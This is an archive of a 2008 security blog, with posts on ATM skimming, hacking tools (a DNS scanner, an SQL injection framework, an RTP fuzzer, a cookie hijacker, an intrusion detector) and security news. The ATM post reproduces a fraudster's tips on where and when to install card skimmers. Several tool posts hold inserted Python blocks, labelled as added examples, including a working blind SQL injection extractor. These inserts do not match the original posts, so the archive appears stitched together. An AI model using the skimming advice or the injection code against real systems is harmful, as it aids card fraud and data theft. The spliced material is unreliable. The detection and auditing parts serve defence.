Archive | September, 2008

Pro ATM Hacker ‘Chao’ Gives Out ATM Hacking Tips

It seems like ATM hacking is still the way to go for those into a bit of hardware hacking. One of the most notorious and well-known ATM hackers was recently arrested in Turkey, and a list of his tips was discovered online, on the same site where he sold ATM skimming equipment.

Well his tips can’t be THAT good if he got caught can they?

A bank-machine hacker who reportedly was arrested earlier this month in Turkey gave would-be fraudsters tips on how to install rogue card-reading devices, including advising them to target drive-through ATMs (automated teller machines) and avoid towns with fewer than 15,000 residents.

The hacker, who went by the handle “Chao,” reportedly was arrested earlier this month in Turkey. He was one of the most well-known ATM hackers in the world, according to Uri Rivner, head of new technologies for RSA Consumer Solutions.

Chao sold fake faceplates that fraudsters could attach to the card slots in ATMs. These “skimmer” devices can read the magnetic stripe of every customer’s ATM or credit card, and are often used in conjunction with a hidden camera that watches people enter their PINs (personal identification numbers), Rivner said. Alternatively, criminals can attach an extra keypad on top of the one in the machine and capture the PIN that way, he added.

It seems like the old methods are still prevailing, but the kit used is probably a lot smaller, neater and more unobtrusive. They skim your card, record your PIN on the number pad with a tiny pinhole camera and usually beam it all to a Wi-Fi PC nearby, which pipes it back to the owner over the net via a 3G phone or similar.

Just be careful where you use the ATM, and cover the number pad with your other hand when you type in your PIN to be extra vigilant.

  • don’t install a skimmer in the morning, because people are more vigilant then;
  • determine where a person would have to stand to keep an eye on everything happening on that block;
  • avoid blocks where more than 250 people per day walk through, because of the danger of detection;
  • don’t install skimmers in towns with fewer than 15,000 people, because people in those towns know what their ATMs look like;
  • avoid areas with small shops open 24 hours a day, because there may be surveillance cameras and vigilant shopkeepers;
  • don’t set up in areas where a lot of illegal immigrants live;
  • places with a lot of tourist traffic are good;
  • look for affluent neighborhoods and drive-through ATMs;
  • ATMs near cash-only bars are a good bet for lots of customer activity.

The tips are nothing ground-breaking, but they are interesting to read nevertheless. Most of them could be considered common sense, but some, like not targeting really small towns, are quite interesting.

I would have thought busy times would have been the best time to go in as long as there is no-one else queuing at the ATM machine.

Source: NetworkWorld


Posted in: Hardware Hacking, Spammers & Scammers


dnsscan – DNS Open Recursive Resolver Scanner/Scanning Tool

Dnsscan is a tool for fingerprinting open recursive resolvers. It runs in conjunction with a small server that knows how to reply to queries forwarded from probed resolvers. For example, assume that you have delegated osd.example.org:

On 10.0.0.1, you would run:

On the client that initiates the DNS probes, you would run

Progress of the dnsscan tool can be monitored via a web browser on port 8080. If the tool crashes or gets terminated, it can be restarted from the checkpoint file.

Both tools log their output to files, which can be inspected with the dnsreader tool.

If this does not mean anything to you, you should probably not use this tool. This tool has been released to support repeatable research, some of the results obtained with tools such as these have been published at NDSS’08.
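The probe side of the setup described above, as an added example in Python that is not part of dnsscan: it builds a recursive query for a name under the delegated zone, sends it to a candidate resolver and classifies the reply from the header flags alone. Two assumptions are this example's, not the page's: osd.example.org is used as the delegated zone (as in the post, replace it with one whose authoritative server you control), and the probed resolver's address is encoded in the query name so the authoritative server's log can attribute each forwarded query to the resolver that relayed it; the page does not say whether dnsscan uses that naming scheme.

```python
import socket
import struct

# Hypothetical delegated zone, standing in for the osd.example.org delegation
# in the post. The authoritative server for this zone is the one you run, and
# its query log is the ground truth for which resolvers really forwarded.
PROBE_ZONE = "osd.example.org"


def encode_name(qname):
    """RFC 1035 wire encoding of a domain name (length-prefixed labels)."""
    labels = qname.rstrip(".").split(".")
    return b"".join(bytes([len(x)]) + x.encode("ascii") for x in labels) + b"\x00"


def build_query(qname, txid, rd=True):
    """Minimal DNS A/IN query. RD (recursion desired) is set so that a
    resolver willing to recurse for strangers forwards the query on."""
    flags = 0x0100 if rd else 0x0000  # QR=0, OPCODE=0, RD=1
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def probe_name(resolver_ip):
    """Put the probed resolver's address into the query name so the query that
    arrives at the authoritative server can be attributed to the resolver that
    relayed it. (Assumption: this is this example's correlation scheme.)"""
    return resolver_ip.replace(".", "-") + "." + PROBE_ZONE


def parse_response(data, expected_txid):
    """Return the header fields we care about, or None if the datagram is not
    a response to our query (wrong transaction id or QR bit clear)."""
    if len(data) < 12:
        return None
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not (flags & 0x8000):
        return None
    return {"ra": bool(flags & 0x0080), "rcode": flags & 0x000F, "answers": an}


def classify(resp):
    """First-pass verdict from the response alone. 'open-recursive' is only a
    strong hint; the authoritative server's log is the proof."""
    if resp is None:
        return "no-response"
    if resp["rcode"] == 5:  # REFUSED
        return "refused"
    if resp["ra"] and resp["rcode"] == 0 and resp["answers"] > 0:
        return "open-recursive"
    if resp["ra"]:
        return "recursion-advertised"
    return "closed"


def probe_resolver(resolver_ip, txid=0x1234, timeout=2.0):
    """Send one probe over UDP and classify the reply (needs network access;
    randomise txid in real use)."""
    query = build_query(probe_name(resolver_ip), txid)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (resolver_ip, 53))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return classify(None)
    return classify(parse_response(data, txid))


if __name__ == "__main__":
    import sys
    for ip in sys.argv[1:]:
        print(ip, probe_resolver(ip))
```

Run it as `python probe.py 192.0.2.53 ...` against resolvers you are allowed to probe; the Notice below about coordinating with your network provider applies just as much to a home-grown probe as to dnsscan itself.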

Notice

Use of dnsscan across a large network block requires coordination with your network provider. In all likelihood, you will receive (and must manage) abuse complaints due to the volume of DNS queries. You should consult RFC 1262 (Guidelines for Internet Measurement Activities) for suggestions on how to conduct such Internet-wide studies.

You can download dnsscan v1.0 here:

dnsscan-1.0.tar.gz

Or read more here.


Posted in: Hacking Tools, Network Hacking


Brits Give Up Passwords For a £5 Gift Voucher

So it turns out you don’t need any fancy password cracking software like John the Ripper or Cain and Abel; you just need a handful of £5 gift vouchers for Marks and Spencer!

We have discussed this in part before: some people will give out their passwords if you just ask, some if you offer chocolate, and this time in the guise of a ‘survey’ for a gift voucher.

Although the majority (60 percent) of 207 London residents were happy to hand over computer password data which might be useful to potential ID thieves in exchange for a £5 M&S gift voucher, the public at large take a hard line on firms who fail to keep tight hold of customer data.

In exchange for the voucher, a number of those quizzed during a street survey in Covent Garden earlier this week went on to explain how they remember their password and which online websites (from a range of email, shopping, banking and social networking sites) they most frequently use. A sizeable chunk of those surveyed (45 per cent) said they used either their birthday, their mother’s maiden name or a pet’s name as a password.

Perhaps it’s just as well that stolen identities are worth a lot less than £5, fetching as little as 50p on the underground black market, according to Symantec.

It seems like rather than giving out the actual password they answered questions put together in such a way that a profiler could easily work out what their password was and which sites they used it on.

Pretty sneaky methinks; it’s a good way to test how paranoid people are about their data security. It’s ironic really, seeing how much they complain, but at the end of it they are their own worst enemy.

Nine in ten (89 per cent) of 1,000 Brits quizzed during a wider survey, commissioned by Symantec and price comparison site moneysupermarket.com, expressed the opinion that “reckless and repeated” data breaches ought to be punished by criminal prosecutions. Sanctions should include the ability to incarcerate directors of negligent firms in jail. Eight out of ten of those quizzed agreed there should be a “one strike and you’re out” rule for data loss.

Almost four in five of those polled reckon their personal data is not secure in the hands of companies that hold it, a finding that probably stems from the steady drip of data breach stories that have followed from the massive HMRC child benefit lost disc bungle last year. Three in four consumers are concerned about the amount of information organisations hold on them, regardless of whether or not this information is held online or offline. Online payments were perceived as the single greatest risk for losing data.

The general public are pretty harsh too when it comes to dishing out punishment, but then again that is human nature and that is why there’s jury service.

It’s not surprising either that people have very little faith in data stored by the government and their greatest fear is carrying out online transactions.

I think we all know well enough to keep ourselves safe…but sadly as always it seems the rest of the world don’t.

Source: The Register


Posted in: Password Cracking, Social Engineering


BSQL Hacker – Automated SQL Injection Framework

BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities in virtually any database.

It ships with Automated Attack modules which allow the dumping of whole databases for the following DBMS:

  • MS-SQL Server
  • ORACLE
  • MySQL (experimental)

Attack Templates for:

  • MS Access
  • MySQL
  • ORACLE
  • PostgreSQL
  • MS-SQL Server

You can also write your own attack template for any other database (see the manual for details). New attack templates and exploits for specific web applications can be shared via the Exploit Repository.

BSQL Hacker is aimed at experienced users as well as beginners who want to automate SQL injections (especially blind SQL injections).

It supports :

  • Blind SQL Injection (Boolean Injection)
  • Full Blind SQL Injection (Time Based)
  • Deep Blind SQL Injection (a new way to exploit BSQLIs, explained here)
  • Error Based SQL Injection

It provides a Metasploit-like exploit repository to share and update exploits and attack templates.
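What the boolean blind mode above automates, as an added example in Python that is not BSQL Hacker’s code: a deliberately injectable lookup against a constructed SQLite database, the bound-parameter version that fixes it, and an extractor that recovers a secret one character at a time using only the yes/no signal of whether the page still shows its row. The table, rows and the `users`/`pw` names are constructed for the example; time-based and error-based injection differ only in what the oracle observes (a delay or an error message), the search loop is the same.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the target's backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return db


def vulnerable_lookup(db, user_id):
    """Deliberately injectable: the parameter is spliced into the SQL text."""
    return db.execute(f"SELECT name FROM users WHERE id = {user_id}").fetchall()


def safe_lookup(db, user_id):
    """Hardened form: the value is bound, so it is never interpreted as SQL."""
    return db.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchall()


class BooleanOracle:
    """Models what a boolean blind attacker sees: only whether the page for
    id=1 still renders its row after appending AND (<condition>)."""

    def __init__(self, db):
        self.db = db
        self.queries = 0  # cost counter, one HTTP request each in real life

    def holds(self, condition):
        self.queries += 1
        return len(vulnerable_lookup(self.db, f"1 AND ({condition})")) > 0


def extract_string(oracle, expr, max_len=64):
    """Recover the value of an SQL expression one character at a time by
    binary-searching its code point in [0, 127] (7 oracle queries per char,
    plus one length probe per position)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle.holds(f"length({expr}) >= {pos}"):
            break  # ran past the end of the string
        lo, hi = 0, 127
        while lo < hi:  # invariant: the code point lies in [lo, hi]
            mid = (lo + hi) // 2
            if oracle.holds(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    oracle = BooleanOracle(db)
    secret = extract_string(oracle, "(SELECT pw FROM users WHERE name = 'admin')")
    print(secret, "recovered in", oracle.queries, "requests")
```

The same payloads handed to `safe_lookup` match nothing, because the whole string is compared against the integer column rather than parsed; that is the entire argument for parameterised queries, and it holds for every DBMS in the lists above.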

You can download BSQL Hacker here:

BSQLHackerSetup-0907.exe

Or read more here.


Posted in: Database Hacking, Hacking Tools, Web Hacking


Intercage – Spam/Malware Friendly ISP Back Online

There has been a big hoo-haa recently about a US ISP called Intercage, who are said to have been harbouring spammers and scammers via their largest client, an Eastern European web host called Esthost.

Their plug got pulled two days ago by their last upstream IP transit provider, after weeks of criticism from the community showing that IP addresses under the management of Intercage were hosting a number of sites engaged in phishing, malware propagation and other illegal activities.

It’s a pretty bold move by UnitedLayer to take them on, but Intercage and their website are back online now.

A day after security experts celebrated the death of a network provider accused of hosting a large concentration of the world’s cybercrime, California-based Intercage appeared to be among the living again.

IP transit provider UnitedLayer agreed to provide upstream service to Intercage about 36 hours after its last transit provider pulled the plug. UnitedLayer’s move, which is sure to prove unpopular in some circles, came after Intercage agreed to completely sever ties with Esthost, the Eastern European web host believed by many to be responsible for the lion’s share of abusive traffic carried by Intercage.

The dumping of Esthost, if true, would mark a major turning point for Intercage. Esthost, which according to many researchers hosts a large number of sites engaged in phishing, malware propagation, and other illegal activities, has relied on Intercage since 2004 and is responsible for 25 percent to 50 percent of its revenue, according to Intercage president and owner Emil Kacperski.

It looks like it’s going to hurt them, with between a quarter and a half of their revenue coming from this one customer! They shouldn’t have put all their eggs in one basket, especially a malware-ridden Eastern European basket.

I think Internet Exchanges and upstream providers need to be more vigilant about spam and malware propagation sites, if hosts refuse to sort the problem out – pull the plug!

For its part, UnitedLayer officials said they thought long and hard about the decision to take on Intercage as a customer, and based on the promises they got, they decided it made sense.

“We have been assured by Emil and Intercage that the customer in question that caused this firestorm has been removed,” said UnitedLayer COO Richard Donaldson. “And we have said very unequivocally to Emil that when and if factual evidence is provided to us that puts him in violation of our AUP (acceptable use policy)…then we will terminate them like we would any other client.”

Over the past few weeks, the Intercage saga has at times resembled the wild west, where justice is meted out by an informal network of power brokers rather than duly appointed officials. Given the frequent inability of today’s law enforcement in overcoming a rat’s nest of extra-territorial and technical issues, this form of frontier justice is probably unavoidable. And in any case, the vast majority of the white hats manning the system are honest and have netizens’ best interests at heart.

There is definitely potential for abuse here, and it’s something that needs to be watched. More people need to take the time to submit abuse reports, with the mail headers and IP addresses, to the upstream providers, data centers and hosts involved.

Some may not know what the sites on their network are doing, some may actually be hacked, and some may be complicit with the spammers, but either way people need to report!

It’s an interesting story and definitely one to watch, let’s just hope no-one starts to abuse this with RIAA take-down notices etc.

Source: The Register


Posted in: Legal Issues, Malware, Spammers & Scammers


ohrwurm – RTP Fuzzing Tool (SIP Phones)

ohrwurm is a small and simple RTP fuzzer; it has been tested on a small number of SIP phones, none of which withstood the fuzzing.

Features:

  • reads SIP messages to get the RTP port numbers
  • reading SIP can be omitted by providing the RTP port numbers directly, so that any RTP traffic can be fuzzed
  • RTCP traffic can be suppressed so that codecs do not learn about the “noisy line”
  • special care is taken to break RTP handling itself
  • the RTP payload is fuzzed with a constant BER (bit error rate)
  • the BER is configurable
  • requires arpspoof from dsniff to do the MITM attack
  • requires both phones to be in a switched LAN (GW operation only works partially)
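The constant-BER payload fuzzing from the feature list, as an added example in Python that is not ohrwurm’s code: it parses the RFC 3550 RTP header (fixed part, CSRC list and extension) so the header can be left intact while every payload bit is flipped independently with probability BER. The sample packet is constructed (a silent PCMU-sized frame); seeding the PRNG makes a crash reproducible, which matters more than the fuzzing itself once a phone falls over. Where ohrwurm breaks the header on purpose, this example keeps it, so it demonstrates only the payload side.

```python
import random
import struct

RTP_FIXED_HEADER = 12


def parse_rtp_header(pkt):
    """Decode the RFC 3550 fixed header (plus CSRC list and extension, if
    present) and return the fields together with the total header length."""
    if len(pkt) < RTP_FIXED_HEADER:
        raise ValueError("packet shorter than the RTP fixed header")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", pkt[:RTP_FIXED_HEADER])
    hdr = {
        "version": b0 >> 6,
        "padding": (b0 >> 5) & 1,
        "extension": (b0 >> 4) & 1,
        "csrc_count": b0 & 0x0F,
        "marker": b1 >> 7,
        "payload_type": b1 & 0x7F,
        "sequence": seq,
        "timestamp": ts,
        "ssrc": ssrc,
    }
    length = RTP_FIXED_HEADER + 4 * hdr["csrc_count"]
    if hdr["extension"]:
        if len(pkt) < length + 4:
            raise ValueError("truncated extension header")
        ext_words = struct.unpack("!H", pkt[length + 2:length + 4])[0]
        length += 4 + 4 * ext_words
    if len(pkt) < length:
        raise ValueError("header claims more bytes than the packet has")
    hdr["header_len"] = length
    return hdr


def fuzz_payload(pkt, ber, seed=None):
    """Flip each payload bit independently with probability `ber`, leaving the
    RTP header intact so the stream still parses and the codec sees a
    plausible but corrupted line. A fixed seed reproduces the same packet."""
    rng = random.Random(seed)
    n = parse_rtp_header(pkt)["header_len"]
    payload = bytearray(pkt[n:])
    for i in range(len(payload)):
        mask = 0
        for bit in range(8):
            if rng.random() < ber:  # random() is in [0, 1), so ber=1.0 flips all
                mask |= 1 << bit
        payload[i] ^= mask
    return bytes(pkt[:n]) + bytes(payload)


def build_rtp(seq, ts, ssrc, payload, payload_type=0, marker=0):
    """Build a minimal RTP packet (version 2, no CSRC, no extension)."""
    b0 = 2 << 6
    b1 = (marker << 7) | (payload_type & 0x7F)
    return struct.pack("!BBHII", b0, b1, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + payload


def bit_errors(a, b):
    """Number of differing bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


if __name__ == "__main__":
    # Constructed frame: 160 bytes of PCMU silence, as one 20 ms G.711 packet.
    pkt = build_rtp(1, 160, 0xDEADBEEF, bytes(160))
    out = fuzz_payload(pkt, ber=0.01, seed=1)
    print("flipped", bit_errors(pkt, out), "of", 8 * 160, "payload bits")
```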

You can download ohrwurm 0.1 here:

ohrwurm-0.1.tar.bz2

Or read more here.


Posted in: Hacking Tools, Network Hacking, Programming


Modern Exploits – Do You Still Need To Learn Assembly Language (ASM)

This is a fairly interesting subject, I think, as a lot of people entering the security field still ask me whether they need to learn assembly language or not.

Assembly Language

For those that aren’t sure what it is, it’s pretty much the lowest-level programming language computers understand without resorting to raw 1s and 0s.

An assembly language is a low-level language for programming computers. It implements a symbolic representation of the numeric machine codes and other constants needed to program a particular CPU architecture. This representation is usually defined by the hardware manufacturer, and is based on abbreviations (called mnemonics) that help the programmer remember individual instructions, registers, etc. An assembly language is thus specific to a certain physical or virtual computer architecture (as opposed to most high-level languages, which are usually portable).

The mnemonics look like MOV, JMP and PUSH.

In straightforward terms the answer is yes, especially if you want to operate at a more advanced level. If you wish to write exploits you need assembly knowledge: there is plenty of great shellcode around, but to get your exploit to the point where you can execute the shellcode you need assembly knowledge. Metasploit is a great resource for shellcode and for delivering your exploit, but to understand the inner workings of any binary you need to understand assembly.

You might be able to fuzz out an overflow in some software using a pre-written Python fuzzer, but what are you going to do then? You need to at least understand the stack and heap and registers like EIP and ESP.

Even if you don’t plan to be that hardcore, learning assembly really won’t hurt at all; a great place to start is the PC Assembly Language book by Paul Carter.


The tutorial has extensive coverage of interfacing assembly and C code and so might be of interest to C programmers who want to learn about how C works under the hood. All the examples use the free NASM (Netwide) assembler. The tutorial only covers programming under 32-bit protected mode and requires a 32-bit protected mode compiler.

If you are specialising, though, you’ll be looking more into the realm of debuggers, disassemblers and reverse engineering. SoftICE was king back in the day.

Another great resource is Iczelion’s Win32 Assembly Homepage which has a bunch of tutorials, source code examples and links.

As many say, assembly is easy to learn but hard to MASTER.

I started out with The Art of Assembly – and I suggest you do too.

Some other resources:


Posted in: Exploits/Vulnerabilities, Programming


Surf Jack – Cookie Session Stealing Tool

A tool which allows one to hijack HTTP connections to steal cookies, even ones belonging to HTTPS sites! It works on both Wi-Fi (monitor mode) and Ethernet. The HTTPS case works because a cookie set without the Secure flag is also sent when the browser is pushed to a plain http:// URL on the same host; the tool injects that redirect into some other cleartext request and captures the cookie from the resulting unencrypted one.

Features:

  • Does Wireless injection when the NIC is in monitor mode
  • Supports Ethernet
  • Support for WEP (when the NIC is in monitor mode)

Known issues:

  • Sometimes the victim is not redirected correctly (particularly seen when targeting Gmail)
  • Cannot stop the tool via a simple Ctrl-C. This is a problem with the proxy
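Why the redirect trick works and how to check a site for it, as an added example in Python that is not part of Surf Jack: a small Set-Cookie parser, a function that decides which cookies a browser would attach to a request over http:// versus https:// to the same host (only the Secure attribute keeps a cookie off the cleartext path), and an audit that reports the cookies an attacker would capture. The two Set-Cookie headers are constructed; the first is the vulnerable pattern, the second the hardened one.

```python
def parse_set_cookie(header):
    """Parse one Set-Cookie header value into (name, value, attributes).
    Attribute names are lower-cased; flag attributes (Secure, HttpOnly)
    map to True."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        if not attr:
            continue
        k, sep, v = attr.partition("=")
        attrs[k.strip().lower()] = v.strip() if sep else True
    return name.strip(), value.strip(), attrs


def cookies_sent_over(headers, scheme):
    """Names of the cookies a browser would attach to a request over `scheme`
    ('http' or 'https') to the host that set them. This is the victim side of
    the hijack: the forged 302 to http://host/ makes the browser send
    everything this returns for 'http' in the clear."""
    sent = []
    for h in headers:
        name, _value, attrs = parse_set_cookie(h)
        if attrs.get("secure") and scheme != "https":
            continue
        sent.append(name)
    return sent


def audit(headers):
    """Findings for cookies that leak when the victim is pushed to http://
    (missing Secure) or are readable from script (missing HttpOnly)."""
    findings = []
    for h in headers:
        name, _value, attrs = parse_set_cookie(h)
        if not attrs.get("secure"):
            findings.append((name, "sent over plain HTTP: add Secure"))
        if not attrs.get("httponly"):
            findings.append((name, "exposed to script: add HttpOnly"))
    return findings


# Constructed headers as an HTTPS site might emit them: the first is the
# pattern the tool exploits, the second is the hardened form.
SAMPLE_HEADERS = [
    "SID=abc123; Path=/; Domain=.example.com",
    "SID_SECURE=def456; Path=/; Secure; HttpOnly",
]

if __name__ == "__main__":
    print("captured on the http:// redirect:", cookies_sent_over(SAMPLE_HEADERS, "http"))
    for name, problem in audit(SAMPLE_HEADERS):
        print(name, "-", problem)
```

Running the audit against your own site’s responses is the cheap way to know whether this tool (or any sniffer on the same LAN or hotspot) would get a usable session out of a single cleartext round trip.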

Requires:

You can download Surf Jack here:

surfjack-0.2b.zip

Or read more here.


Posted in: Hacking Tools, Web Hacking


Web Application Security Statistics for 2008

Purpose

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2007. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape. We ascertain which classes of attacks are the most prevalent regardless of the methodology used to identify them. Industry statistics such as those compiled by Mitre CVE project provide valuable insight into the types of vulnerabilities discovered in open source and commercial applications, this project tries to be the equivalent for custom web applications

Goals

  1. Identify the prevalence and probability of different vulnerability classes
  2. Compare testing methodologies against what types of vulnerabilities they are likely to identify.

Methodology

The statistics were compiled from web application security assessment projects carried out by the following companies in 2007 (in alphabetical order):

Booz Allen Hamilton
BT
Cenzic with Hailstorm and ClickToSecure
dblogic.it
HP Application Security Center with WebInspect
Positive Technologies with MaxPatrol
Veracode with Veracode Security Review
WhiteHat Security with WhiteHat Sentinel

There are some pretty interesting statistics in there.

Read the full report here:

http://www.webappsec.org/projects/statistics/


Posted in: Web Hacking


psad – Intrusion Detection and Log Analysis with iptables

psad is a collection of three lightweight system daemons (two main daemons and one helper daemon) that run on Linux machines and analyze iptables log messages to detect port scans and other suspicious traffic. A typical deployment is to run psad on the iptables firewall where it has the fastest access to log data.

psad incorporates many signatures from the Snort intrusion detection system to detect probes for various backdoor programs (e.g. EvilFTP, GirlFriend, SubSeven), DDoS tools (mstream, shaft), and advanced port scans (FIN, NULL, XMAS) which are easily leveraged against a machine via nmap.

When combined with fwsnort and the Netfilter string match extension, psad is capable of detecting many attacks described in the Snort rule set that involve application layer data. In addition, psad makes use of various packet header fields associated with TCP SYN packets to passively fingerprint remote operating systems (in a manner similar to p0f) from which scans originate.

For more information, see the complete list of features offered by psad.

psad is developed around three main principles:

  • Good network security starts with a properly configured firewall.
  • A significant amount of intrusion detection data can be gleaned from firewall logs, especially if the logs provide information on nearly every field of the network and transport headers (and even application layer signature matches, as in Netfilter’s case).
  • Suspicious traffic should not be detected at the expense of trying to also block such traffic.
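The second principle above in miniature, as an added example in Python that is not psad’s code (psad itself is Perl and signature-driven): a parser for the kernel’s iptables LOG line format, a classifier for the FIN, NULL and XMAS flag combinations mentioned earlier, and a per-source port-sweep detector over a constructed batch of log lines. The log prefix `DROP`, the addresses and the port threshold are this example’s choices; a real deployment would read `/var/log/messages` (or wherever the LOG target lands) continuously rather than a list.

```python
import re
from collections import defaultdict, Counter

TCP_FLAGS = {"CWR", "ECE", "URG", "ACK", "PSH", "RST", "SYN", "FIN"}
KV_RE = re.compile(r"\b([A-Z]+)=(\S*)")


def parse_iptables_line(line):
    """Parse one iptables LOG target line into a dict, or None for lines that
    are not iptables log records. The kernel prints TCP flags as bare tokens
    after RES= (e.g. 'RES=0x00 SYN URGP=0'), so they are collected separately
    from the KEY=value fields."""
    if "IN=" not in line or "PROTO=" not in line:
        return None
    fields = dict(KV_RE.findall(line))
    flags = set()
    if fields.get("PROTO") == "TCP" and "RES=" in line:
        tail = line.split("RES=", 1)[1].split()
        flags = {tok for tok in tail if tok in TCP_FLAGS}
    return {
        "src": fields.get("SRC"),
        "dst": fields.get("DST"),
        "proto": fields.get("PROTO"),
        "dpt": int(fields["DPT"]) if fields.get("DPT") else None,
        "flags": flags,
    }


def scan_type(flags):
    """Classify a TCP packet by its flag combination (the nmap -sN/-sX/-sF
    probes). Anything else is treated as normal traffic."""
    if not flags:
        return "null"
    if {"FIN", "PSH", "URG"} <= flags:
        return "xmas"
    if flags == {"FIN"}:
        return "fin"
    return "normal"


def detect_scans(lines, port_threshold=5):
    """Return alerts as (src, kind, count). 'portscan' fires when one source
    hits at least `port_threshold` distinct TCP ports; the stealth kinds fire
    on a single packet, since a legitimate stack never sends them."""
    ports = defaultdict(set)
    stealth = defaultdict(Counter)
    for line in lines:
        pkt = parse_iptables_line(line)
        if pkt is None or pkt["proto"] != "TCP" or pkt["dpt"] is None:
            continue
        ports[pkt["src"]].add(pkt["dpt"])
        kind = scan_type(pkt["flags"])
        if kind != "normal":
            stealth[pkt["src"]][kind] += 1
    alerts = []
    for src in sorted(set(ports) | set(stealth)):
        if len(ports[src]) >= port_threshold:
            alerts.append((src, "portscan", len(ports[src])))
        for kind, n in sorted(stealth[src].items()):
            alerts.append((src, kind, n))
    return alerts


def make_line(src, dpt, flags, proto="TCP"):
    """Build a constructed log line in the kernel's iptables LOG format."""
    base = (f"Sep 10 14:02:11 fw kernel: DROP IN=eth0 OUT= SRC={src} DST=192.0.2.10 "
            f"LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO={proto} SPT=44321 DPT={dpt}")
    if proto == "TCP":
        base += " WINDOW=1024 RES=0x00 " + "".join(f + " " for f in flags) + "URGP=0"
    else:
        base += " LEN=20"
    return base


# Constructed sample: a SYN sweep over six ports, an XMAS and a NULL probe from
# a second host, one UDP packet and one ordinary connection attempt.
SAMPLE_LOG = (
    [make_line("198.51.100.7", p, ["SYN"]) for p in (21, 22, 23, 25, 80, 443)]
    + [make_line("203.0.113.9", 80, ["FIN", "PSH", "URG"]),
       make_line("203.0.113.9", 22, []),
       make_line("192.0.2.200", 53, [], proto="UDP"),
       make_line("192.0.2.50", 22, ["SYN"])]
)

if __name__ == "__main__":
    for src, kind, n in detect_scans(SAMPLE_LOG):
        print(f"{src:15} {kind:9} {n}")
```

Two things the toy shows that matter in production: the detector only sees what the firewall logs, so a ruleset that ACCEPTs without logging hides the scan (the first principle above), and the alert is derived from the log alone, with no blocking in the path (the third).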

You can download psad v2.1.4 here:

psad-2.1.4.tar.gz (Source tar)
psad-2.1.4-1.i386.rpm (i386 binary RPM).

Or read more here.


Posted in: Countermeasures, Network Hacking, Security Software
